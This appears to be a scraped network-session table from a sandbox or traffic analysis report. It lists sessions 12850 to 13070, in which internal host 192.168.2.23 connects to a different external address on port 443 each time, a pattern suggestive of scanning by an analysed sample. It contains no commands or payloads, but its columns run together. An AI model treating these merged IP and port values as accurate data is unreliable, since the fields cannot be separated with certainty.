                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12850192.168.2.2333646152.15.205.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12851192.168.2.2355030183.87.254.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12852192.168.2.2359010125.174.245.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12853192.168.2.2335622193.146.39.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12854192.168.2.2333836202.100.73.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12855192.168.2.234313486.109.13.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12856192.168.2.2333586113.149.34.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12857192.168.2.2356794124.93.252.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12858192.168.2.234736298.47.151.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12859192.168.2.2344818154.208.183.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12860192.168.2.2337202117.41.62.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12861192.168.2.234368094.65.3.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12862192.168.2.233813094.23.32.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12863192.168.2.234348081.151.195.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12864192.168.2.234612281.250.102.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12865192.168.2.2340882146.3.247.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12866192.168.2.235100867.0.26.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12867192.168.2.2354596189.206.216.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12868192.168.2.2353388167.108.5.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12869192.168.2.234809871.193.74.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12870192.168.2.235995294.62.242.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12871192.168.2.23478048.107.250.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12872192.168.2.235820634.234.171.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12873192.168.2.2341234134.174.93.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12874192.168.2.2333882206.143.85.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12875192.168.2.2350270149.13.188.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12876192.168.2.2352258167.81.186.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12877192.168.2.2349914145.255.155.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12878192.168.2.235095641.87.153.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12879192.168.2.234320696.56.183.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12880192.168.2.233721296.207.42.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12881192.168.2.2353432198.73.56.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12882192.168.2.2353852182.219.81.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12883192.168.2.2352594221.141.203.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12884192.168.2.2360994161.240.172.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12885192.168.2.2338180113.125.138.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12886192.168.2.2354590148.36.52.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12887192.168.2.235538217.44.196.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12888192.168.2.2349418107.22.120.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12889192.168.2.2337572216.89.4.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12890192.168.2.2336714194.175.252.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12891192.168.2.2337506129.4.191.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12892192.168.2.235005281.80.105.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12893192.168.2.234477475.175.34.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12894192.168.2.2360878186.152.52.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12895192.168.2.2346690141.162.110.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12896192.168.2.234019613.107.232.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12897192.168.2.2344142185.221.11.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12898192.168.2.2353496102.84.165.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12899192.168.2.235608440.4.137.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12900192.168.2.233812666.206.210.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12901192.168.2.2333676205.118.215.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12902192.168.2.234015665.63.206.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12903192.168.2.2335464152.53.205.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12904192.168.2.235340051.89.245.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12905192.168.2.2349720201.124.249.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12906192.168.2.233495263.135.188.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12907192.168.2.2360036180.226.220.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12908192.168.2.2351856198.74.132.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12909192.168.2.235657040.90.88.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12910192.168.2.235506444.205.40.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12911192.168.2.2357104117.92.205.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12912192.168.2.2347108158.193.159.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12913192.168.2.2332912178.250.246.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12914192.168.2.235049481.70.70.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12915192.168.2.2359456116.47.46.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12916192.168.2.2348354194.98.56.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12917192.168.2.2333702131.216.210.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12918192.168.2.2347886192.41.126.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12919192.168.2.2334356173.113.254.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12920192.168.2.2358700163.46.128.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12921192.168.2.2336844101.246.205.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12922192.168.2.233448064.128.251.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12923192.168.2.235172063.156.39.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12924192.168.2.233902063.20.21.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12925192.168.2.2351734191.244.224.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12926192.168.2.234282858.177.99.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12927192.168.2.2358868218.73.190.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12928192.168.2.235160696.112.24.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12929192.168.2.2336410150.13.251.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12930192.168.2.2342870190.92.25.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12931192.168.2.23547028.59.119.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12932192.168.2.2343310174.160.101.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12933192.168.2.234299060.121.179.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12934192.168.2.2350740189.66.50.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12935192.168.2.235916870.126.144.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12936192.168.2.2345496221.226.194.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12937192.168.2.2344060211.12.210.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12938192.168.2.235185243.39.130.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12939192.168.2.235063043.176.184.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12940192.168.2.2357168120.45.12.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12941192.168.2.2333902182.126.150.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12942192.168.2.2345162107.16.6.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12943192.168.2.233913467.205.18.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12944192.168.2.2339872136.0.131.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12945192.168.2.234483899.7.167.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12946192.168.2.235813496.222.188.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12947192.168.2.2342752102.226.157.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12948192.168.2.2356398180.53.91.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12949192.168.2.234994251.152.134.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12950192.168.2.2340800195.249.19.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12951192.168.2.2358208218.134.68.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12952192.168.2.2344838187.179.187.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12953192.168.2.233637882.248.13.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12954192.168.2.23553708.95.202.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12955192.168.2.2353732148.156.110.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12956192.168.2.2344622177.127.20.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12957192.168.2.2359770131.2.155.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12958192.168.2.235873080.70.104.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12959192.168.2.233420680.183.59.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12960192.168.2.234753291.241.89.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12961192.168.2.235082661.203.183.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12962192.168.2.234386690.102.85.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12963192.168.2.235892094.90.59.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12964192.168.2.233898445.74.215.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12965192.168.2.234745825.212.212.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12966192.168.2.2354388185.45.221.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12967192.168.2.2355724128.133.48.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12968192.168.2.2336220182.162.255.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12969192.168.2.2344918159.190.132.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12970192.168.2.234641497.41.166.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12971192.168.2.2348850150.180.1.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12972192.168.2.2353390116.96.120.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12973192.168.2.2341018159.221.34.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12974192.168.2.233755844.22.108.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12975192.168.2.2339266135.198.223.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12976192.168.2.2342648201.27.13.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12977192.168.2.234890838.109.35.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12978192.168.2.234218689.140.103.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12979192.168.2.2354288201.62.111.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12980192.168.2.2355826219.255.230.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12981192.168.2.2343988169.119.161.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12982192.168.2.2356980153.65.154.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12983192.168.2.234058851.26.248.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12984192.168.2.2344182182.55.175.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12985192.168.2.235398867.53.41.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12986192.168.2.235362860.92.113.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12987192.168.2.2346178174.125.30.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12988192.168.2.2338910211.229.87.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12989192.168.2.233611875.239.76.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12990192.168.2.2350078109.72.205.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12991192.168.2.235005267.80.130.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12992192.168.2.2345378199.42.106.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12993192.168.2.235858824.230.171.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12994192.168.2.2356204208.236.153.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12995192.168.2.234493854.150.140.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12996192.168.2.2360378177.85.108.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12997192.168.2.2352802152.47.99.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12998192.168.2.2353380137.169.83.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12999192.168.2.2335556139.97.58.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13000192.168.2.233918276.251.50.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13001192.168.2.235902413.29.53.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13002192.168.2.2341300184.154.61.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13003192.168.2.234767817.19.107.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13004192.168.2.2339358181.233.216.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13005192.168.2.2350344146.61.201.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13006192.168.2.2354204204.25.79.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13007192.168.2.234049464.102.39.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13008192.168.2.233946291.125.252.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13009192.168.2.234487289.75.103.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13010192.168.2.234639250.184.197.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13011192.168.2.234411079.186.206.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13012192.168.2.233570282.109.12.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13013192.168.2.2343404136.227.168.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13014192.168.2.2343590209.110.11.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13015192.168.2.236096289.152.93.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13016192.168.2.233671643.36.168.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13017192.168.2.235140891.154.112.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13018192.168.2.23536344.124.211.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13019192.168.2.2353136121.80.13.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13020192.168.2.2343864180.74.109.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13021192.168.2.2337522139.77.95.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13022192.168.2.234939878.62.201.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13023192.168.2.235379877.222.26.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13024192.168.2.233530675.132.176.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13025192.168.2.2352740175.231.87.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13026192.168.2.234353449.254.59.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13027192.168.2.235773649.221.132.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13028192.168.2.235238841.82.100.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13029192.168.2.2352492158.175.188.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13030192.168.2.2354254177.197.121.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13031192.168.2.233423865.243.10.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13032192.168.2.23448785.153.133.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13033192.168.2.23392082.124.33.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13034192.168.2.2342198165.44.19.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13035192.168.2.2356396108.68.148.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13036192.168.2.2347484185.86.216.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13037192.168.2.2335932213.29.183.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13038192.168.2.2346048118.134.112.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13039192.168.2.235677671.200.35.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13040192.168.2.2344148155.183.48.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13041192.168.2.233417439.20.173.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13042192.168.2.233390427.107.33.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13043192.168.2.2345308113.169.144.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13044192.168.2.233782445.255.88.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13045192.168.2.2348034106.168.174.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13046192.168.2.2359898131.55.80.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13047192.168.2.2352600170.38.140.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13048192.168.2.2350036116.41.119.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13049192.168.2.2349122197.38.13.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13050192.168.2.2348086217.108.198.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13051192.168.2.2345818205.130.39.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13052192.168.2.2344898145.177.251.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13053192.168.2.2340390155.42.250.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13054192.168.2.2344472166.163.178.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13055192.168.2.23386561.184.244.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13056192.168.2.234342264.121.163.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13057192.168.2.2339452101.200.115.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13058192.168.2.235441274.93.90.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13059192.168.2.2341304142.140.238.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13060192.168.2.2334838137.129.214.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13061192.168.2.235683640.176.103.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13062192.168.2.235775493.246.110.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13063192.168.2.2334172132.238.172.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13064192.168.2.2357840192.246.65.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13065192.168.2.2336144116.9.190.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13066192.168.2.2357932194.20.123.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13067192.168.2.235581874.126.192.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13068192.168.2.2350550115.6.31.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13069192.168.2.234579648.194.145.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13070192.168.2.233995879.100.124.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
